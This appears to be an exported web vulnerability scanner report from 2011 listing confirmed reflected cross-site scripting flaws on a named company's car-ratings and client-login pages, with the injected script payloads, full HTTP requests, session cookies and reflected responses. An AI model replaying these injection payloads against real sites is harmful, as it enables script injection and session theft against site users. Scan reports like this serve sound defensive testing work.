href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div 
class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail 
to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select 
name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="'"--></style></script><script>netsparker(0x000C1A)</script>" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr> <tr><td>2.</td><td>&l..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST '"--></style></script><script>alert(0x000C1B)</script>
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C1B)%3c%2fscript%3e&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:50:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title> [... page header, navigation bar, side menu and ratings form identical to the previous consumers.php response, omitted; the only difference is the reflection point below ...] <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="'"--></style></script><script>netsparker(0x000C1B)</script>" /> <input type="hidden" name="mo2" id="mo2" value="3" /> [...]
- /client_dao_authenticate.php

/client_dao_authenticate.php CONFIRMED

http://www.strategicvision.com/client_dao_authenticate.php

Parameters

Parameter Type Value
userID POST '"--></style></script><script>alert(0x000C1C)</script>
password POST 3
submitButton POST Login

Request

POST /client_dao_authenticate.php HTTP/1.1
Referer: http://www.strategicvision.com/client_dao_login.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 122
Expect: 100-continue
Accept-Encoding: gzip, deflate

userID='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C1C)%3c%2fscript%3e&password=3&submitButton=Login

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:50:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<script language="JavaScript" type="text/javascript"> alert("Your access code and password are invalid. Please try again."); window.location.href = "client_dao_login.php"; </script> <html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - DAO: Delight &amp; Opportunity</title> [... page header, navigation bar and side menu identical to the consumers.php responses above, omitted ...] <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;DAO: Delight &amp; Opportunity</div> <div class="pagetext"> <p>User ID: <span class="blogtitle">'"--></style></script><script>netsparker(0x000C1C)</script></span></p> <div class="pagesubtitle">Content</div> <p>Information goes here...</p> </div> <!-- End the page --> </td> 
</tr></table> <hr noshade size="1" color="#DDDDDD" width="760" align="center" /><table id="footertable" align="center"> <tr> <td align="left" valign="top" width="50%"> <a href="sitemap.php" class="footer">SITE MAP</a> &nbsp; | &nbsp; <!--<a href="privacy.php" class="footer">PRIVACY POLICY</a> &nbsp; | &nbsp; --> <a href="press_contacts.php" class="footer">CONTACT US</a> &nbsp; | &nbsp;<a href="admin.php" class="footer">ADMIN</a> &nbsp; | &nbsp; <a href="privacy.php" class="footer">PRIVACY</a> </td> <td align="right" valign="top" width="50%"> &copy; 2004-2011 Strategic Vision, Inc.<br /> Site by <!--<a href="http://www.nickbarrett.org" title="Nick Barrett" target="_blank" class="footer">Nick Barrett</a> &amp;--><a href="mailto:pgossling@gmail.com" class="footer">Philip Gossling</a> </td> </tr></table> </div> </td> <td width="5" bgcolor="#CCCCCC" background="images/content_rightshadow.gif">&nbsp;</td> </tr></table> </center> </body></html>
- /client_dao_authenticate.php

/client_dao_authenticate.php CONFIRMED

http://www.strategicvision.com/client_dao_authenticate.php

Parameters

Parameter Type Value
userID POST '"--></style></script><script>alert(0x000C26)</script>
password POST 3

Request

POST /client_dao_authenticate.php HTTP/1.1
Referer: http://www.strategicvision.com/client_dao_login.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 103
Expect: 100-continue
Accept-Encoding: gzip, deflate

userID='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C26)%3c%2fscript%3e&password=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:50:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<script language="JavaScript" type="text/javascript"> alert("Your access code and password are invalid. Please try again."); window.location.href = "client_dao_login.php"; </script> <html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - DAO: Delight &amp; Opportunity</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" 
align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> 
</div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a 
href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CLIENTS</div><div class="sidemenu_item"><a href="clients.php">Past Clients</a></div><!--<div class="sidemenu_item"><a href="client_success.php">Success Stories</a></div>--><!--<div class="sidemenu_item"><a href="client_dao_login.php">DAO Login</a></div>--><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;DAO: Delight &amp; Opportunity</div> <div class="pagetext"> <p>User ID: <span class="blogtitle">'"--></style></script><script>netsparker(0x000C26)</script></span></p> <div class="pagesubtitle">Content</div> <p>Information goes here...</p> </div> <!-- End the page --> </td> 
</tr></table> <hr noshade size="1" color="#DDDDDD" width="760" align="center" /><table id="footertable" align="center"> <tr> <td align="left" valign="top" width="50%"> <a href="sitemap.php" class="footer">SITE MAP</a> &nbsp; | &nbsp; <!--<a href="privacy.php" class="footer">PRIVACY POLICY</a> &nbsp; | &nbsp; --> <a href="press_contacts.php" class="footer">CONTACT US</a> &nbsp; | &nbsp;<a href="admin.php" class="footer">ADMIN</a> &nbsp; | &nbsp; <a href="privacy.php" class="footer">PRIVACY</a> </td> <td align="right" valign="top" width="50%"> &copy; 2004-2011 Strategic Vision, Inc.<br /> Site by <!--<a href="http://www.nickbarrett.org" title="Nick Barrett" target="_blank" class="footer">Nick Barrett</a> &amp;--><a href="mailto:pgossling@gmail.com" class="footer">Philip Gossling</a> </td> </tr></table> </div> </td> <td width="5" bgcolor="#CCCCCC" background="images/content_rightshadow.gif">&nbsp;</td> </tr></table> </center> </body></html>
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST 3
numCars POST '"--></style></script><script>alert(0x000DD7)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 200
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=3&numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000DD7)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:54:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
